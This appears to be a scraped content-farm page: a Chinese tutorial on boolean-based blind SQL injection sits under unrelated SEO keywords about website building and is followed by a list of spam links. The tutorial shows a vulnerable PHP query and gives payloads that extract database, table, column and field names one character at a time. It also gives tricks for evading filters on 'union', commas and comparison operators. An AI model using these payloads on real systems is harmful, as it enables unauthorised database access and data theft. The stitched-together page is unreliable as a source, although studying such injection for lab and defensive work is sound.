当前位置: 首页 > news >正文

松原做网站如何在百度上推广业务

news 2025/11/5 11:21:54
松原做网站,如何在百度上推广业务,邢台市天气预报,网页版传奇复古布尔盲注适用场景#xff1a; 1、WAF或者过滤函数完全过滤掉union关键字 2、页面中不再回显具体数据#xff0c;但是在SQL语句执行成功或失败返回不同的内容 代码分析#xff1a;过滤关键字 union if(preg_match(/union/i, $id)) { echo fail; exit; } 代码…布尔盲注适用场景 1、WAF或者过滤函数完全过滤掉union关键字 2、页面中不再回显具体数据但是在SQL语句执行成功或失败返回不同的内容 代码分析过滤关键字 union if(preg_match(/union/i, $id)) { echo fail; exit; } 代码分析数据不会回显 $conn mysql_connect(localhost,root,123456) or die(连接数据库失败!); mysql_query(set names utf-8,$conn); mysql_query(use web_sql,$conn); $sql select * from person where id {$id}; $res mysql_query($sql,$conn) or die(mysql_error()); $row mysql_fetch_array($res); if($row){ $flag success; }else{ $flag fail; }布尔注入原理 利用 逻辑关系对SQL语句进行“干预”。 例如 select * from article where id 1 如果拼接and 11 恒为真输 出正确情况。 如果拼接 and 12 恒为假输出错误情况。 此时可以确定 and 11 和 and 12 返回不同结果此时id参数存在SQL注入漏洞。 布尔盲注实验 1、获取数据库名称 遍历数据库长度的字符最终找到数据名称web_sql andlength(database())num #根据页面返回长度判断数据库长度 andsubstr(database(),1,1)a #逐字遍历替换a #substr substring mid 都可以截取字符串其中一部分 如果过滤引号可以适用 andascii(substr(database(),1,1)) 96 #根据ascii值判断 ord 也可以实 现 2、获取数据表名称 其中 limit m,n m为起始位置,n为长度。 limit 0,1 获取第一个数据。 and ord(mid((select table_name from information_schema.tables where table_schemaweb_sql limit 2,1),1,1)) 963、获取字段名称 and ord(mid((select column_name from information_schema.columns where table_nameadmin limit 2,1),1,1)) 974、获取数值部分 and ord(mid((select 字段 from 表名),1,1)) 97布尔盲注过滤绕过技巧 绕过核心就是将布尔利用技术中的关键字进行替换 and ord(mid((select table_name from information_schema.tables where table_schemaweb_sql limit 2,1),1,1)) 961、过滤逗号绕过技巧 在进行盲注过程中可能需要substr(),mid(),limit等函数或操作符此时要用到逗号。如果逗号被过滤可 以使用以下技巧。 mid(username,1,1) 等价于 mid(username from 1 for 1) substr(username,1,1) 等价于 substr(username from 1 for 1) select * from admin limit 1,1 等价于 select * from admin limit 1 offset 1;2、过滤比较运算符技巧 在进行盲注过程中需要适用大于或小于比较运算符。如果过滤可以使用以下技巧 。 greatest(n1, n2, n3…):返回n中的最大值 greatest(ascii(substr(username,1,1)),1)97; least(n1,n2,n3…):返回n中的最小值 strcmp(str1,str2):若所有的字符串均相同则返回0若根据当前分类次序第一个参数小于第二个则返回 -1其它情况返回 1 substr(username,1,1) in (t); between a and b:范围在a-b之间 and substr(username,1,1) between a and t; and substr(username,1,1) between t and t; 实验完成题目过滤绕过 过滤代码 preg_match(/union|and|benchmark|ascii|substr|,||||\s/i,$sql)
http://www.dnsts.com.cn/news/157849.html

相关文章:

  • 福建省网站建设绩效排名ui生成器网站
  • 文具用品网站设计规划书做网站带源码软件
  • 网站备案最新备案号在线做静态头像的网站
  • 网站建设教程特别棒湖南岚鸿权 威网站开发 简历项目经历
  • 棋牌游戏网站建设费用wordpress版权破解
  • 哪些网站是用php编写的台州网络优化
  • 大学课程免费自学网站南京做网站公司 雷仁
  • 青岛做公司网站注册的多吗wordpress %2$s
  • 如何细分行业 做网站赚钱建设工程交易服务网
  • 计算机网站建设维护的基本知识开发平台指什么
  • 营销单页模板网站网站建设和推广话术
  • 网站平台建设实施方案做英文网站的心得
  • 黔南州建设局网站企业网站建设的一般要素主要包括网站的
  • 哪里有做配音的兼职网站移动深圳网站
  • 东莞专业网站建设公司电商网站开发设计
  • 人才交流中心招聘网站建设方案许昌seo公司
  • 做网站公司实力排名c2c的电子商务网站有哪些
  • 天津武清网站开发经典品牌推广文案
  • 门户类网站开发多少钱阿凡达网站设计
  • 网站后台登录地址怎么安全有哪些专做自然风景图片的网站
  • 网站后台文本编辑器广州专业网站设计定制
  • 网站建设服务类型现状邯郸网站建设哪家专业
  • 网站空间ip地址网络营销最火的案例
  • 西安域名注册网站建设wordpress 网站logo
  • 网站系统建设开票要开什么免费好用的网站管理系统
  • 网站建设常见问题小程序多用户商城源码
  • 网站多国语言设计微信到wordpress
  • 开平网站制作网站改版后多久才收录
  • 房地产集团网站欣赏做期权注册网站
  • 杭州 建设网站网站建设168